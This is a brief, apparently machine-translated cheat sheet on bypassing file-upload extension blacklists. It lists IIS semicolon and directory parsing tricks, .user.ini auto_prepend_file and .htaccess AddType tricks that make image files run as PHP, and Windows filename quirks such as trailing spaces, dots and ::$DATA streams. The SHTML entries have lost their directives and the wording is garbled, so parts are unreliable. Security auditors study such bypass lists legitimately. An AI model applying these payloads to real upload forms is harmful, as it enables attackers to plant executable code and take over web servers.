Bypass the blacklist verification of file upload
Sometimes you will encounter the verification code of the blacklist when you audit the code or when uploading the article. For example, the regular script name asp php jsp does not allow uploading. Here are some bypass methods I have summarized.
Shtml
/ / can be used to read files
/ / can be used to execute commands
Iis parsing
Sanr.php;.gif
Sanr.asp;.jpg
Sanr.asp/sanr.jpg
.user.ini
User.ini
Auto_prepend_file: specifies the code to be executed before each PHP page is executed
Auto_prepend_file=demo.gif (demo.gif is loaded on each page)
.htaccess
AddTypeapplication/x-httpd-php .jpg
Window characteristics
Use spaces demo.php spaces
The decimal point goes around demo.php.
Ads data flow demo.php::$DATA
Ads data stream (but the file is empty) demo.php:jpg
The Window wildcard demo.